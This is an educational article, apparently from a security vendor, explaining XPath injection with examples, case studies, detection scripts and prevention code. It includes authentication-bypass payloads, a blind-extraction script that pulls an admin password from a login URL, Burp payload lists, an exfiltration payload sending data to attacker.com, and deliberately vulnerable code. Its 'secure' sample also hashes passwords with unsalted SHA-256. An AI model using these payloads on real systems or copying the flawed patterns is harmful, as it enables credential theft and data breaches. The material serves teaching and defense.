# XPath Injection

A code injection attack where malicious XPath queries are injected into applications that use XML databases, allowing attackers to bypass authentication or extract sensitive data.

HIGH SEVERITY DATA BREACH XML SECURITY

# What is XPath Injection?

Critical Data Exposure Risk

XPath Injection can expose entire XML databases, bypass authentication systems, and reveal sensitive information including passwords, financial data, and personal records.

In Simple Terms:

Imagine an XML database as a filing cabinet with folders organized in a specific structure. XPath is like the search command you use to find specific documents.

A normal search might be: "Find the folder for user 'John' with password 'secret123'"

XPath Injection is like manipulating the search to say: "Find the folder for user 'John' OR just show me ALL folders regardless of password"

The filing system follows your manipulated instructions and hands over everything - including documents you shouldn't see.

# Real-World Analogy

Think of XPath like a library's book search system:

XML stores data in a tree structure, like a library organizing books by:

Category → Genre → Author → Title
Similar to: /library/category/genre/author/book

Librarian searches:

xpath
//book[author='Smith' and title='The Secret']

Returns: One specific book by Smith

Attacker modifies search:

xpath
//book[author='Smith' or '1'='1' and title='anything']

The or '1'='1' part is always true
Returns: ALL books in the library!

The search system can't distinguish between a legitimate complex search and a manipulated one.

# How XPath Injection Works

# Understanding XPath and XML

XML (eXtensible Markup Language) stores data in a tree structure:

<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <password>secretAdminPass123</password>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password>john'sPassword456</password>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>

XPath is a query language for selecting nodes from XML:

xpath
//user[username='admin' and password='secretAdminPass123']

# The Attack Process

Application builds XPath query:

xpath
//user[username='admin' and password='correctPass']

Returns: Admin user if password matches

Attacker enters username: admin' or '1'='1 Application builds query:

xpath
//user[username='admin' or '1'='1' and password='anything']

'1'='1' is always true
The or operator makes entire condition true
Password check is bypassed

XPath returns the admin user without validating password, granting full access.

# Types of XPath Injection Attacks

# 1. Authentication Bypass

CRITICAL

from lxml import etree

def authenticate_user(username, password):
    # Load XML database
    tree = etree.parse('users.xml')

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//user[username='{username}' and password='{password}']"

    # Execute query
    result = tree.xpath(xpath_query)

    if result:
        return True  # User authenticated
    return False

# Attack payload
username = "admin' or '1'='1"
password = "anything"

# Resulting query: //user[username='admin' or '1'='1' and password='anything']
# Returns admin user without password verification!

Username Injections:
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='

Password Injections:
' or '1'='1
anything' or 'x'='x

Combined:
Username: admin
Password: ' or '1'='1

xpath
Original query:
//user[username='admin' and password='correctPass']

Injected query:
//user[username='admin' or '1'='1' and password='anything']

Result: Returns admin user because '1'='1' is always true

HIGH RISK

When application doesn't display query results directly, attackers extract data character by character using boolean conditions.

# Testing if admin user exists
payload = "' or count(//user[username='admin'])=1 or ''='"

# Extracting admin password length
payload = "' or string-length(//user[username='admin']/password)=16 or ''='"

# Extracting first character of password
payload = "' or substring(//user[username='admin']/password,1,1)='a' or ''='"
payload = "' or substring(//user[username='admin']/password,1,1)='b' or ''='"
# ... continue for each character

# Extracting second character
payload = "' or substring(//user[username='admin']/password,2,1)='e' or ''='"

import requests
import string

def extract_admin_password(url):
    """Extract admin password character by character"""
    password = ""
    charset = string.ascii_letters + string.digits + string.punctuation

    # First, find password length
    for length in range(1, 50):
        payload = f"' or string-length(//user[username='admin']/password)={length} or ''='"
        response = requests.post(url, data={'username': payload, 'password': 'test'})

        if "success" in response.text or response.status_code == 200:
            print(f"[+] Password length: {length}")
            break

    # Extract each character
    for position in range(1, length + 1):
        for char in charset:
            payload = f"' or substring(//user[username='admin']/password,{position},1)='{char}' or ''='"
            response = requests.post(url, data={'username': payload, 'password': 'test'})

            if "success" in response.text:
                password += char
                print(f"[+] Found character {position}: {char} (password so far: {password})")
                break

    return password

# Usage
admin_password = extract_admin_password('https://vulnerable-site.com/login')
print(f"[!] Admin password: {admin_password}")

# 3. Complete XML Document Extraction

MEDIUM RISK

# Vulnerable search function
def search_products(product_name):
    tree = etree.parse('products.xml')

    # VULNERABLE: No input sanitization
    xpath_query = f"//product[name='{product_name}']"

    results = tree.xpath(xpath_query)
    return results

# Normal search
search_products("Laptop")
# Query: //product[name='Laptop']
# Returns: Laptop products

# Malicious search - Extract all products
search_products("' or '1'='1")
# Query: //product[name='' or '1'='1']
# Returns: ALL products in database!

# Extract specific sensitive data
search_products("'] | //user[username='admin")
# Query: //product[name=''] | //user[username='admin']
# Returns: Admin user data from users section!

Attack payloads using XPath functions:

Count nodes:
' or count(//user)>0 or ''='

Extract node names:
' or name(//user[1])='user' or ''='

Extract all text:
' or //text() or ''='

Access parent nodes:
' or //user/parent::* or ''='

Navigate XML structure:
' or //*/password or ''='

# 4. Out-of-Band Data Exfiltration

ADVANCED TECHNIQUE

# Some XPath implementations support external functions
# Attacker can exfiltrate data via HTTP requests

payload = """' or doc('http://attacker.com/steal?data=' || //user[username='admin']/password) or ''='"""

# This sends admin password to attacker's server

# Real-World Examples

# Case Study 1: Financial Institution Data Breach (2016)

Major bank's internal employee portal used XML database with XPath for authentication.

@app.route('/employee/login', methods=['POST'])
def employee_login():
    username = request.form['username']
    password = request.form['password']

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//employee[username='{username}' and password='{password}']"

    tree = etree.parse('/data/employees.xml')
    result = tree.xpath(xpath_query)

    if result:
        session['user'] = result[0].find('username').text
        session['role'] = result[0].find('role').text
        return redirect('/dashboard')

    return "Login failed"

External attacker discovered vulnerability through error messages:

Username: admin' or '1'='1
Password: [empty]

Then used blind XPath injection to extract:

All employee credentials
Salary information
Social security numbers
Bank account details
Customer account numbers

15,000+ employee records compromised
2.5 million customer accounts at risk
$45 million in direct costs (remediation, notification, credit monitoring)
$120 million regulatory fines
$85 million class action settlement
Stock price dropped 22%
CEO and CIO resigned

# Case Study 2: Healthcare Portal XML Injection (2018)

250,000 Patients Affected

HIPAA Violation

XPath injection in patient portal exposed electronic health records stored in XML format.

Technical Details:

<!-- Their XML structure -->
<patients>
  <patient>
    <id>P12345</id>
    <name>John Doe</name>
    <ssn>123-45-6789</ssn>
    <diagnosis>Diabetes Type 2</diagnosis>
    <medications>
      <medication>Metformin 500mg</medication>
      <medication>Insulin Glargine</medication>
    </medications>
    <insurance>
      <provider>BlueCross</provider>
      <policy>BC-12345678</policy>
    </insurance>
  </patient>
</patients>

# Their vulnerable patient lookup
def get_patient_records(patient_id, dob):
    # VULNERABLE: No input validation
    xpath = f"//patient[id='{patient_id}' and dateOfBirth='{dob}']"

    tree = etree.parse('/secure/patients.xml')
    results = tree.xpath(xpath)

    return render_template('patient_record.html', patient=results)

Attack Payload:

Patient ID: ' or '1'='1
Date of Birth: [any]

What Was Exposed:

250,000 patient health records
Diagnoses and treatment histories
Prescriptions and medications
Social security numbers
Insurance information
Lab results and medical images

Consequences:

$16 million HIPAA violation fine
$42 million class action lawsuit
Criminal investigation by DOJ
Hospital system lost major contracts
3-year compliance monitoring imposed

# Case Study 3: E-commerce Product Database Breach (2019)

Online retailer storing product catalog and customer reviews in XML

// Node.js vulnerable product search
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

app.get('/products/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE: Direct string interpolation
  const xpathQuery = `//product[contains(name, '${searchTerm}') or contains(description, '${searchTerm}')]`;

  const xml = fs.readFileSync('products.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  const results = xpath.select(xpathQuery, doc);

  res.json(results);
});

Attacker used search functionality to inject:

Search: ') or '1'='1'] | //customer[contains(email, '@

This extracted:

Internal product costs and margins
Supplier pricing
Customer email addresses
Order histories
Payment information

800,000 customer emails harvested
Used for phishing campaign
Competitive pricing information leaked
$3.5 million in losses
$8 million GDPR fines

# How to Detect XPath Injection

# Manual Testing

Find inputs that might query XML:

Login forms
Search boxes
Filter parameters
ID lookups
API endpoints

Try XPath special characters:

' " / [ ] ( ) @ * |

Watch for:

XML parsing errors
XPath syntax errors
Changes in response
Different behavior

' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
'] | //user[@* or '1'='1

' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='

# Automated Testing Script

import requests
from urllib.parse import quote

def test_xpath_injection(target_url, param_name):
    """Test for XPath injection vulnerabilities"""

    test_payloads = [
        # Authentication bypass
        "' or '1'='1",
        "' or 1=1 or ''='",
        "admin' or '1'='1' or ''='",
        "' or ''='",
        "x' or 1=1 or 'x'='y",

        # Boolean tests
        "' or count(//user)>0 or ''='",
        "' or string-length(//user[1]/password)>0 or ''='",

        # Node extraction
        "'] | //user | //x[@'='",
        "'] | //* | //x[@'='",

        # Function tests
        "' or name()='user' or ''='",
        "' or local-name()='password' or ''='",

        # Parent node access
        "'] | //user/parent::* | //x[@'='"
    ]

    vulnerabilities = []
    baseline_response = None

    try:
        # Get baseline response
        baseline_response = requests.get(target_url, params={param_name: 'normaltest'})
    except Exception as e:
        print(f"[-] Error getting baseline: {e}")
        return []

    print(f"[*] Testing {target_url} parameter '{param_name}'...")

    for payload in test_payloads:
        try:
            response = requests.get(
                target_url,
                params={param_name: payload},
                timeout=5
            )

            # Check for vulnerability indicators
            if response.status_code != baseline_response.status_code:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Status Code Change',
                    'severity': 'MEDIUM',
                    'status': response.status_code
                })
                print(f"[!] Status change with: {payload}")

            # Check for XPath errors
            xpath_errors = [
                'xpath',
                'XPathException',
                'xmlXPathEval',
                'XPath error',
                'XPath syntax error',
                'Invalid predicate',
                'Invalid expression'
            ]

            for error in xpath_errors:
                if error.lower() in response.text.lower():
                    vulnerabilities.append({
                        'payload': payload,
                        'type': 'XPath Error Message',
                        'severity': 'HIGH',
                        'error': error
                    })
                    print(f"[!] XPath error revealed with: {payload}")
                    break

            # Check for successful bypass (content changes)
            if len(response.text) > len(baseline_response.text) * 1.5:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Possible Authentication Bypass',
                    'severity': 'CRITICAL',
                    'note': 'Significantly more content returned'
                })
                print(f"[!] CRITICAL: Possible bypass with: {payload}")

        except requests.exceptions.Timeout:
            print(f"[-] Timeout with payload: {payload}")
        except Exception as e:
            print(f"[-] Error testing '{payload}': {e}")

    return vulnerabilities

# Test your application
vulns = test_xpath_injection(
    'https://example.com/search',
    'q'  # Query parameter name
)

if vulns:
    print(f"\n[!] Found {len(vulns)} potential XPath injection vulnerabilities!")
    for vuln in vulns:
        print(f"  [{vuln['severity']}] {vuln['type']}: {vuln['payload']}")
else:
    print("[+] No XPath injection vulnerabilities detected")

# Burp Intruder payload list for XPath injection
payloads = """
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
x' or 1=1 or 'x'='y
'] | //user[@* or '1'='1'] | //x[@'='
'] | //* | //x[@'='
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='
' or name()='user' or ''='
"""

# Configure Burp:
# 1. Set payload positions at vulnerable parameters
# 2. Load payloads from above list
# 3. Grep Match:
#    - xpath
#    - XPathException
#    - xmlXPathEval
#    - Invalid predicate
# 4. Check for status code changes
# 5. Compare response lengths

# Prevention Strategies

# 1. Parameterized XPath Queries

MOST SECURE

from lxml import etree

def safe_authenticate(username, password):
    """Secure XPath authentication using parameterized queries"""

    tree = etree.parse('users.xml')

    # Method 1: Use XPath variables (lxml supports this)
    # SECURE: Parameters are passed separately
    xpath_query = "//user[username=$username and password=$password]"

    result = tree.xpath(
        xpath_query,
        username=username,
        password=password
    )

    if result:
        return {
            'authenticated': True,
            'username': result[0].find('username').text,
            'role': result[0].find('role').text
        }

    return {'authenticated': False}

# Attack payloads will NOT work
username = "admin' or '1'='1"
password = "anything"

# XPath treats these as literal strings, not code:
# username = "admin' or '1'='1" (the WHOLE string including quotes)
# password = "anything"
# No injection possible!

const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

function safeAuthenticate(username, password) {
  const xml = fs.readFileSync('users.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  // Method: Manually iterate and compare (most secure)
  // SECURE: No XPath injection possible

  const users = xpath.select('//user', doc);

  for (let user of users) {
    const userUsername = xpath.select('string(username)', user);
    const userPassword = xpath.select('string(password)', user);

    // Direct string comparison (no injection)
    if (userUsername === username && userPassword === password) {
      return {
        authenticated: true,
        username: userUsername,
        role: xpath.select('string(role)', user)
      };
    }
  }

  return { authenticated: false };
}

// Attack payloads will not work
const result = safeAuthenticate("admin' or '1'='1", "anything");
// This looks for EXACT match of username "admin' or '1'='1"
// No code execution - just string comparison

import javax.xml.parsers.*;
import javax.xml.xpath.*;
import org.w3c.dom.*;
import java.io.File;

public class SecureXPathAuth {

    public static boolean authenticateUser(String username, String password) {
        try {
            // Parse XML
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new File("users.xml"));

            // SECURE: Use XPath with variables
            XPathFactory xPathFactory = XPathFactory.newInstance();
            XPath xPath = xPathFactory.newXPath();

            // Set variables (parameterized)
            SimpleVariableResolver resolver = new SimpleVariableResolver();
            resolver.addVariable("username", username);
            resolver.addVariable("password", password);
            xPath.setXPathVariableResolver(resolver);

            // Parameterized query
            String xpathExpression = "//user[username=$username and password=$password]";

            XPathExpression expr = xPath.compile(xpathExpression);
            NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

            return nodes.getLength() > 0;

        } catch (Exception e) {
            System.err.println("Authentication error: " + e.getMessage());
            return false;
        }
    }

    // Variable resolver for XPath parameters
    static class SimpleVariableResolver implements XPathVariableResolver {
        private Map<String, Object> variables = new HashMap<>();

        public void addVariable(String name, Object value) {
            variables.put(name, value);
        }

        @Override
        public Object resolveVariable(QName variableName) {
            return variables.get(variableName.getLocalPart());
        }
    }
}

# 2. Input Validation and Sanitization

DEFENSE IN DEPTH

import re
from html import escape

def sanitize_xpath_input(user_input):
    """Sanitize input for XPath queries"""

    # Method 1: Strict allowlist validation
    if not re.match(r'^[a-zA-Z0-9@._-]{3,50}$', user_input):
        raise ValueError("Invalid input format")

    return user_input

def escape_xpath_value(value):
    """Escape special XPath characters"""

    # XPath doesn't have standard escaping, so we need to be creative

    # If value contains both ' and ", we're in trouble with XPath 1.0
    # Best approach: Use concat function

    if "'" not in value:
        # Simple case: wrap in single quotes
        return f"'{value}'"
    elif '"' not in value:
        # No double quotes: wrap in double quotes
        return f'"{value}"'
    else:
        # Contains both: use concat function
        parts = value.split("'")
        quoted_parts = [f'"{part}"' if part else "''" for part in parts]
        return f"concat({', '.join(quoted_parts)})"

def safe_search_products(product_name):
    """Secure product search with escaping"""

    # Validate input
    if not product_name or len(product_name) > 100:
        return []

    tree = etree.parse('products.xml')

    # Escape the value
    escaped_name = escape_xpath_value(product_name)

    # Build query with escaped value
    xpath_query = f"//product[name={escaped_name}]"

    results = tree.xpath(xpath_query)
    return results

# Example usage
# Input: O'Reilly Books
# Escaped: concat("O", "'", "Reilly Books")
# Query: //product[name=concat("O", "'", "Reilly Books")]

import re
from typing import Any, Optional

class XPathInputValidator:
    """Comprehensive XPath input validation"""

    # Validation patterns
    USERNAME_PATTERN = r'^[a-zA-Z0-9._-]{3,20}$'
    EMAIL_PATTERN = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    ALPHANUMERIC_PATTERN = r'^[a-zA-Z0-9\s]{1,100}$'

    # Dangerous XPath keywords
    XPATH_KEYWORDS = [
        'or', 'and', 'not', 'div', 'mod', 'union', '|',
        'parent::', 'ancestor::', 'following::', 'preceding::',
        'document', 'doc', 'collection'
    ]

    @staticmethod
    def validate_username(username: str) -> bool:
        """Validate username format"""
        return bool(re.match(XPathInputValidator.USERNAME_PATTERN, username))

    @staticmethod
    def validate_email(email: str) -> bool:
        """Validate email format"""
        return bool(re.match(XPathInputValidator.EMAIL_PATTERN, email))

    @staticmethod
    def check_dangerous_keywords(value: str) -> bool:
        """Check for dangerous XPath keywords"""
        value_lower = value.lower()

        for keyword in XPathInputValidator.XPATH_KEYWORDS:
            if keyword in value_lower:
                return False

        return True

    @staticmethod
    def sanitize_and_validate(value: str, input_type: str = 'alphanumeric') -> Optional[str]:
        """Sanitize and validate input"""

        # Check length
        if not value or len(value) > 100:
            raise ValueError("Input length invalid")

        # Remove dangerous characters
        dangerous_chars = ["'", '"', '/', '[', ']', '(', ')', '@', '*', '|', '\\']

        for char in dangerous_chars:
            if char in value:
                raise ValueError(f"Dangerous character detected: {char}")

        # Check for XPath keywords
        if not XPathInputValidator.check_dangerous_keywords(value):
            raise ValueError("Dangerous XPath keyword detected")

        # Type-specific validation
        if input_type == 'username':
            if not XPathInputValidator.validate_username(value):
                raise ValueError("Invalid username format")
        elif input_type == 'email':
            if not XPathInputValidator.validate_email(value):
                raise ValueError("Invalid email format")
        elif input_type == 'alphanumeric':
            if not re.match(XPathInputValidator.ALPHANUMERIC_PATTERN, value):
                raise ValueError("Invalid alphanumeric input")

        return value

# Usage
try:
    username = XPathInputValidator.sanitize_and_validate("admin' or '1'='1", 'username')
    # Raises: ValueError: Dangerous character detected: '
except ValueError as e:
    print(f"Invalid input: {e}")

# 3. Migrate from XML to Secure Database

LONG-TERM SOLUTION

# Instead of XML/XPath, use proper database with parameterized queries

import sqlite3
from werkzeug.security import check_password_hash

def authenticate_with_database(username, password):
    """Secure authentication using SQLite with parameterized queries"""

    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()

    # SECURE: Parameterized query (no injection possible)
    cursor.execute(
        "SELECT username, password_hash, role FROM users WHERE username = ?",
        (username,)
    )

    result = cursor.fetchone()
    conn.close()

    if result and check_password_hash(result[1], password):
        return {
            'authenticated': True,
            'username': result[0],
            'role': result[2]
        }

    return {'authenticated': False}

# Injection payloads have NO effect
username = "admin' or '1'='1"
# Treated as literal string "admin' or '1'='1"
# No code execution possible!

# 4. Comprehensive Security Implementation

[xpath_security.py]
from lxml import etree
from typing import Optional, Dict, Any
import logging
import hashlib

class SecureXPathService:
    """Enterprise-grade secure XPath service"""

    def __init__(self, xml_file: str):
        self.xml_file = xml_file
        self.tree = None
        self.logger = logging.getLogger(__name__)
        self.load_xml()

    def load_xml(self):
        """Load and validate XML file"""
        try:
            # Parse with security settings
            parser = etree.XMLParser(
                remove_blank_text=True,
                resolve_entities=False,  # Prevent XXE
                no_network=True,         # No external resources
                dtd_validation=False,    # No DTD validation
                load_dtd=False           # Don't load DTD
            )

            self.tree = etree.parse(self.xml_file, parser)

        except Exception as e:
            self.logger.error(f"Failed to load XML: {e}")
            raise

    def authenticate(self, username: str, password: str) -> Dict[str, Any]:
        """Secure authentication - iterate manually"""

        # Input validation
        if not self._validate_username(username):
            self.logger.warning(f"Invalid username format: {username}")
            return {'authenticated': False}

        # Iterate through users manually (no XPath injection possible)
        users = self.tree.xpath('//user')

        for user in users:
            stored_username = user.find('username').text
            stored_password_hash = user.find('password_hash').text

            if stored_username == username:
                # Check password hash
                password_hash = self._hash_password(password)

                if password_hash == stored_password_hash:
                    self.logger.info(f"Successful authentication: {username}")
                    return {
                        'authenticated': True,
                        'username': stored_username,
                        'role': user.find('role').text
                    }

        self.logger.warning(f"Failed authentication: {username}")
        return {'authenticated': False}

    def _validate_username(self, username: str) -> bool:
        """Strict username validation"""
        import re
        return bool(re.match(r'^[a-zA-Z0-9._-]{3,20}$', username))

    def _hash_password(self, password: str) -> str:
        """Hash password"""
        return hashlib.sha256(password.encode()).hexdigest()

    def search_safe(self, field: str, value: str) -> list:
        """Safe search without user-controlled XPath"""

        # Whitelist allowed fields
        allowed_fields = ['username', 'email', 'role']

        if field not in allowed_fields:
            raise ValueError(f"Invalid field: {field}")

        # Validate input
        if not value or len(value) > 100:
            raise ValueError("Invalid search value")

        # Manual iteration (no XPath with user input)
        results = []
        users = self.tree.xpath('//user')

        for user in users:
            field_value = user.find(field)

            if field_value is not None and value.lower() in field_value.text.lower():
                results.append({
                    'username': user.find('username').text,
                    'email': user.find('email').text,
                    'role': user.find('role').text
                })

        return results

[users.xml]
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <!-- Store password hashes, not plaintext -->
    <password_hash>5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8</password_hash>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password_hash>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</password_hash>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>

# Security Checklist

# Development

Never concatenate user input into XPath queries
Use parameterized XPath queries when available
Validate all inputs with strict allowlists
Remove or escape XPath special characters: ' " / [ ] ( ) @ * |
Check for dangerous XPath keywords (or, and, union, |)
Store password hashes, never plaintext
Consider migrating from XML to proper database
Implement comprehensive input validation

# Testing

Test with XPath injection payloads
Verify authentication bypass attempts fail
Test boolean-based blind injection
Check for XPath error messages in responses
Test with special characters
Verify node extraction attempts fail
Test with XPath functions (count, substring, etc.)
Use automated scanners (Burp Suite, OWASP ZAP)

# Production

Disable XML entity expansion (prevent XXE)
Implement comprehensive logging
Monitor for suspicious query patterns
Set up alerts for authentication anomalies
Regular security audits
Keep XML libraries updated
Implement rate limiting
Use Web Application Firewall (WAF)

# Key Takeaways

Critical Security Points

Never concatenate user input: Always use parameterized queries or manual iteration
Prefer alternative storage: Consider using proper databases instead of XML for sensitive data
Validate strictly: Use allowlist-based validation for all user inputs
Escape special characters: If concatenation is unavoidable, escape: ' " / [ ] ( ) @ * |
Hash passwords: Never store plaintext passwords in XML
Limit error messages: Don't reveal XPath syntax or structure in errors
Manual iteration is safest: When in doubt, iterate through nodes manually and compare strings
Defense in depth: Combine multiple protection layers (validation + escaping + monitoring)

# How Layerd AI Protects Against XPath Injection

Layerd AI provides comprehensive XPath injection protection:

Automatic Input Sanitization: Detects and escapes XPath special characters in all inputs
Query Pattern Analysis: Identifies malicious XPath syntax and boolean conditions
Authentication Monitoring: Alerts on suspicious login attempts and bypass patterns
XML Security Scanning: Analyzes XML data storage for security best practices
Real-time Blocking: Prevents XPath injection attempts before they reach your XML database
Code Analysis: Scans application code for vulnerable XPath query construction

Secure your XML data with Layerd AI's intelligent XPath injection protection.

# Additional Resources

Last Updated: November 2025